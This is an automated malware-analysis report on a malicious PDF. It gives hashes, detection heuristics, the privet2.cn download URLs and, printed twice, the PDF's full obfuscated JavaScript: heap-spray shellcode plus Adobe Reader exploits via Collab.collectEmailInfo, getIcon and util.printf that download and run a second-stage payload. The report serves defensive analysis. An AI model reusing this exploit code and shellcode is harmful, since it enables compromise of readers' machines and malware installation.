PDF malware analysis — malicious · 53dba4eafd9ef03b

MALICIOUS

PDF

6.7 KB First seen: 2026-05-08

MD5: 695e12d922c9ab2f7859f247eec741f0 SHA-1: 9300e2b811231c7763bc8a120707a193c8c2abc9 SHA-256: 53dba4eafd9ef03bd62e2d7f8f8fe6a48dd722ae74bbfa96cff4f76e8a68ca82

308 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The primary heuristic suggests the presence of JavaScript actions and streams, with a specific mention of unescape() usage, which is often employed for obfuscation. The extracted artifact 'javascript_obj0009_000.js' is likely the source of this malicious behavior. The script's purpose is inferred to be downloading and executing a second-stage payload, although the exact details are obscured. The lack of readable document body text and the obfuscated nature of the script limit the confidence in a more specific family attribution.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

     var XS776TV1OWX0eeCLkn2 = 0x0c0c0c0c;
     var SfkPm43ahdobsGiyLBU =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u …
   }

PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://privet2.cn/arend_nt/getexe.php?spl=pdf_email Referenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_prntfReferenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_icnReferenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexeReferenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	5983 bytes
SHA-256: `cd9eee914ef9605ea3f172df63ca2c364ff78d8488cd2bbaca0e7c0ba9faa26d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 7 eval/decoder/string-building token(s). 22 of 42 identifiers look randomly generated (e.g. 'djBnpRV7xPQF7StUE14') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script var UjxiDe9p1TmnCUGkK8m = new Array(); var PvPfAwQl1DVZ2EWkSBt; var lave = eval; function LBM5zYZFIuM6JIUySRO(JScj2eyYPRkIjvfovEO, eXIXcbq7aIYyX1bG3GF) { while(JScj2eyYPRkIjvfovEO.length * 2 < eXIXcbq7aIYyX1bG3GF) { JScj2eyYPRkIjvfovEO += JScj2eyYPRkIjvfovEO; } JScj2eyYPRkIjvfovEO = JScj2eyYPRkIjvfovEO.substring(0, eXIXcbq7aIYyX1bG3GF / 2); return JScj2eyYPRkIjvfovEO; } function GfgKyQGdEBrcMOvu2Wl(M84g6aghrix8JcndbDu) { if(M84g6aghrix8JcndbDu == 0) { var XS776TV1OWX0eeCLkn2 = 0x0c0c0c0c; var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C"); } else if(M84g6aghrix8JcndbDu == 1) { XS776TV1OWX0eeCLkn2 = 0x30303030; var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066"); } else if(M84g6aghrix8JcndbDu == 2) { var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E"); } var oZ2tigXv2Ij3jOm9BqB = 0x400000; var NXoa0grrfD30ZbATKq2 = SfkPm43ahdobsGiyLBU.length * 2; var eXIXcbq7aIYyX1bG3GF = oZ2tigXv2Ij3jOm9BqB - (NXoa0grrfD30ZbATKq2 + 0x38); var JScj2eyYPRkIjvfovEO = unescape("%u9090%u9090"); JScj2eyYPRkIjvfovEO = LBM5zYZFIuM6JIUySRO(JScj2eyYPRkIjvfovEO, eXIXcbq7aIYyX1bG3GF); var ErJzu4OhCZXNL5BwDrn = (XS776TV1OWX0eeCLkn2 - 0x400000) / oZ2tigXv2Ij3jOm9BqB; for(var IW28gajq44g6JYOISRg = 0; IW28gajq44g6JYOISRg < ErJzu4OhCZXNL5BwDrn; IW28gajq44g6JYOISRg++) { UjxiDe9p1TmnCUGkK8m[IW28gajq44g6JYOISRg] = JScj2eyYPRkIjvfovEO + SfkPm43ahdobsGiyLBU; } } function GdGh1clCYz4M5aNBGyu() { var q3yn8IMVboxIybYfcAR = 0; var GjRs6VTThjRcrUafbt2 = app.viewerVersion.toString(); app.clearTimeOut(PvPfAwQl1DVZ2EWkSBt); if((GjRs6VTThjRcrUafbt2 >= 8 && GjRs6VTThjRcrUafbt2 < 8.102) \|\| GjRs6VTThjRcrUafbt2 < 7.1) { GfgKyQGdEBrcMOvu2Wl(0); var qUq5mogLUIWw7FNyLtS = unescape("%u0c0c%u0c0c"); while(qUq5mogLUIWw7FNyLtS.length < 44952) qUq5mogLUIWw7FNyLtS += qUq5mogLUIWw7FNyLtS; var QaBGC4kniMgjTBZYxOF = this; var ktXppe6DdQ86FhHWuKH = Collab; QaBGC4kniMgjTBZYxOF["collabStore"] = ktXppe6DdQ86FhHWuKH["collectEmailInfo"]( { subj : "", msg : qUq5mogLUIWw7FNyLtS } ); } if((GjRs6VTThjRcrUafbt2 >= 8.102 && GjRs6VTThjRcrUafbt2 < 8.104) \|\| (GjRs6VTThjRcrUafbt2 >= 9 && GjRs6VTThjRcrUafbt2 < 9.1) \|\| GjRs6VTThjRcrUafbt2 <= 7.101) { try { if(app.doc.Collab.getIcon) { GfgKyQGdEBrcMOvu2Wl(2); var j3dNl8YLgWjvpcSfS7k = unescape("%09"); while(j3dNl8YLgWjvpcSfS7k.length < 0x4000) { j3dNl8YLgWjvpcSfS7k += j3dNl8YLgWjvpcSfS7k; } j3dNl8YLgWjvpcSfS7k = "N." + j3dNl8YLgWjvpcSfS7k; var djBnpRV7xPQF7StUE14 = app; djBnpRV7xPQF7StUE14["doc"]["Collab"]["getIcon"](j3dNl8YLgWjvpcSfS7k); q3yn8IMVboxIybYfcAR = 1; } else { q3yn8IMVboxIybYfcAR = 1; } } catch(e) { q3yn8IMVboxIybYfcAR = 1; } if(q3yn8IMVboxIybYfcAR == 1) { if(GjRs6VTThjRcrUafbt2 == 8.102 \|\| GjRs6VTThjRcrUafbt2 == 7.1) { GfgKyQGdEBrcMOvu2Wl(1); var shZIcPv65NCp5w1slRN = "12999999999999999999"; for(yOmHetkXOyYRXF2qsQl = 0; yOmHetkXOyYRXF2qsQl < 276; yOmHetkXOyYRXF2qsQl++) { shZIcPv65NCp5w1slRN += "8"; } var TV0AKD7K6rlSjAF2p0l = util; TV0AKD7K6rlSjAF2p0l["printf"]("%45000f", shZIcPv65NCp5w1slRN); } } } } app.fXjvyHB184Qt2w3CGFI = GdGh1clCYz4M5aNBGyu; PvPfAwQl1DVZ2EWkSBt = app.setTimeOut("app.fXjvyHB184Qt2w3CGFI()", 1);
`javascript_obj0009_000_shellcode_00.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6	276 bytes
SHA-256: `53b3e4c7a38345353f3fa1ae4b7ff52d402e922a3c928c5080347dbe2dec1883`
`javascript_obj0009_000_shellcode_01.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6	276 bytes
SHA-256: `d3ec852c1d2decd4c16deaf172efa38de6b4ff01d8134aa8e996f13f2df4eb41`
`javascript_obj0009_000_shellcode_02.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6	274 bytes
SHA-256: `12ed26cd8dd7e85424451cd7e17e925b4b010481b1a4fd61291904ff3ca0143d`
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5979 bytes
SHA-256: `ee4960f1af1ac03541722d4e5429bb125ce5b10866d306440211da4d6317dd87`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 7 eval/decoder/string-building token(s). 22 of 42 identifiers look randomly generated (e.g. 'djBnpRV7xPQF7StUE14') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script var UjxiDe9p1TmnCUGkK8m = new Array(); var PvPfAwQl1DVZ2EWkSBt; var lave = eval; function LBM5zYZFIuM6JIUySRO(JScj2eyYPRkIjvfovEO, eXIXcbq7aIYyX1bG3GF) { while(JScj2eyYPRkIjvfovEO.length * 2 < eXIXcbq7aIYyX1bG3GF) { JScj2eyYPRkIjvfovEO += JScj2eyYPRkIjvfovEO; } JScj2eyYPRkIjvfovEO = JScj2eyYPRkIjvfovEO.substring(0, eXIXcbq7aIYyX1bG3GF / 2); return JScj2eyYPRkIjvfovEO; } function GfgKyQGdEBrcMOvu2Wl(M84g6aghrix8JcndbDu) { if(M84g6aghrix8JcndbDu == 0) { var XS776TV1OWX0eeCLkn2 = 0x0c0c0c0c; var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C"); } else if(M84g6aghrix8JcndbDu == 1) { XS776TV1OWX0eeCLkn2 = 0x30303030; var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066"); } else if(M84g6aghrix8JcndbDu == 2) { var SfkPm43ahdobsGiyLBU = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E"); } var oZ2tigXv2Ij3jOm9BqB = 0x400000; var NXoa0grrfD30ZbATKq2 = SfkPm43ahdobsGiyLBU.length * 2; var eXIXcbq7aIYyX1bG3GF = oZ2tigXv2Ij3jOm9BqB - (NXoa0grrfD30ZbATKq2 + 0x38); var JScj2eyYPRkIjvfovEO = unescape("%u9090%u9090"); JScj2eyYPRkIjvfovEO = LBM5zYZFIuM6JIUySRO(JScj2eyYPRkIjvfovEO, eXIXcbq7aIYyX1bG3GF); var ErJzu4OhCZXNL5BwDrn = (XS776TV1OWX0eeCLkn2 - 0x400000) / oZ2tigXv2Ij3jOm9BqB; for(var IW28gajq44g6JYOISRg = 0; IW28gajq44g6JYOISRg < ErJzu4OhCZXNL5BwDrn; IW28gajq44g6JYOISRg++) { UjxiDe9p1TmnCUGkK8m[IW28gajq44g6JYOISRg] = JScj2eyYPRkIjvfovEO + SfkPm43ahdobsGiyLBU; } } function GdGh1clCYz4M5aNBGyu() { var q3yn8IMVboxIybYfcAR = 0; var GjRs6VTThjRcrUafbt2 = app.viewerVersion.toString(); app.clearTimeOut(PvPfAwQl1DVZ2EWkSBt); if((GjRs6VTThjRcrUafbt2 >= 8 && GjRs6VTThjRcrUafbt2 < 8.102) \|\| GjRs6VTThjRcrUafbt2 < 7.1) { GfgKyQGdEBrcMOvu2Wl(0); var qUq5mogLUIWw7FNyLtS = unescape("%u0c0c%u0c0c"); while(qUq5mogLUIWw7FNyLtS.length < 44952) qUq5mogLUIWw7FNyLtS += qUq5mogLUIWw7FNyLtS; var QaBGC4kniMgjTBZYxOF = this; var ktXppe6DdQ86FhHWuKH = Collab; QaBGC4kniMgjTBZYxOF["collabStore"] = ktXppe6DdQ86FhHWuKH["collectEmailInfo"]( { subj : "", msg : qUq5mogLUIWw7FNyLtS } ); } if((GjRs6VTThjRcrUafbt2 >= 8.102 && GjRs6VTThjRcrUafbt2 < 8.104) \|\| (GjRs6VTThjRcrUafbt2 >= 9 && GjRs6VTThjRcrUafbt2 < 9.1) \|\| GjRs6VTThjRcrUafbt2 <= 7.101) { try { if(app.doc.Collab.getIcon) { GfgKyQGdEBrcMOvu2Wl(2); var j3dNl8YLgWjvpcSfS7k = unescape(" "); while(j3dNl8YLgWjvpcSfS7k.length < 0x4000) { j3dNl8YLgWjvpcSfS7k += j3dNl8YLgWjvpcSfS7k; } j3dNl8YLgWjvpcSfS7k = "N." + j3dNl8YLgWjvpcSfS7k; var djBnpRV7xPQF7StUE14 = app; djBnpRV7xPQF7StUE14["doc"]["Collab"]["getIcon"](j3dNl8YLgWjvpcSfS7k); q3yn8IMVboxIybYfcAR = 1; } else { q3yn8IMVboxIybYfcAR = 1; } } catch(e) { q3yn8IMVboxIybYfcAR = 1; } if(q3yn8IMVboxIybYfcAR == 1) { if(GjRs6VTThjRcrUafbt2 == 8.102 \|\| GjRs6VTThjRcrUafbt2 == 7.1) { GfgKyQGdEBrcMOvu2Wl(1); var shZIcPv65NCp5w1slRN = "12999999999999999999"; for(yOmHetkXOyYRXF2qsQl = 0; yOmHetkXOyYRXF2qsQl < 276; yOmHetkXOyYRXF2qsQl++) { shZIcPv65NCp5w1slRN += "8"; } var TV0AKD7K6rlSjAF2p0l = util; TV0AKD7K6rlSjAF2p0l["printf"]("E000f", shZIcPv65NCp5w1slRN); } } } } app.fXjvyHB184Qt2w3CGFI = GdGh1clCYz4M5aNBGyu; PvPfAwQl1DVZ2EWkSBt = app.setTimeOut("app.fXjvyHB184Qt2w3CGFI()", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.